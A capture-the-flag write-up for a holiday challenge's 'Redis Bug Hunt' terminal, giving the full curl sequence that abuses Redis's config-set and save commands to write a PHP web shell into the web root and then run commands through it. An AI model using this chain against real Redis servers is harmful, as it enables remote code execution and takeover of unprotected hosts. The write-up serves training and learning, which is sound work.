Redis Bug Hunt: SHHC20
Redis Bug Hunt

In the Kitchen beside Holly Evergreen is a terminal titled Redis Bug Hunt.

In talking with Holly, she mentions doing remote code execution against the host.

Redis Bug Hunt

Googling around for various ways to abuse Redis, the main thing I found was to use the "save database" functionality to write a new file to the file system.

The db save is in redis format, so it has some binary characters at the beginning and end. Best bet will be to encode some crlf before/after whatever I want and look for a forgiving interpetation of the file.

The system doens't have ssh client installed, so I can't drop an ssh key to login as root.

When I drop a file into /etc/sudoers.d, sudoers complains about format do to the binary at the top

I try dropping cron jobs into various locations without much luck. Doesn't look like cron is running. (Likely standard in container?)

Redis Bug Hunt

Well... For this challenge, I don't need to get root (though it would be neat). I just need to look at the index page. So let's try dumping a php file.

URL encode the following string: "\n\n\n<?php system($_GET['cmd']); ?>\n\n"

After a couple of tries to get syntax just right, I dropped a new php file that would take an arg and execute raw command. I then used this to cat the index file.

Clear the existing redis values with command curl http://localhost/maintenance.php?cmd=flushall

Set the encoded value with curl http://localhost/maintenance.php?cmd=set,command,%22%0D%0A%0D%0A%0D%0A%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E%0D%0A%0D%0A%22%0D%0A

Save to the apache working directory with curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html/, then curl http://localhost/maintenance.php?cmd=config,set,dbfilename,jeremy.php, and finally curl http://localhost/maintenance.php?cmd=save

Send a command to the new page curl --output - http://localhost/jeremy.php?cmd=cat+index.php

An overview of all people, places, and events can be learned in the Introduction.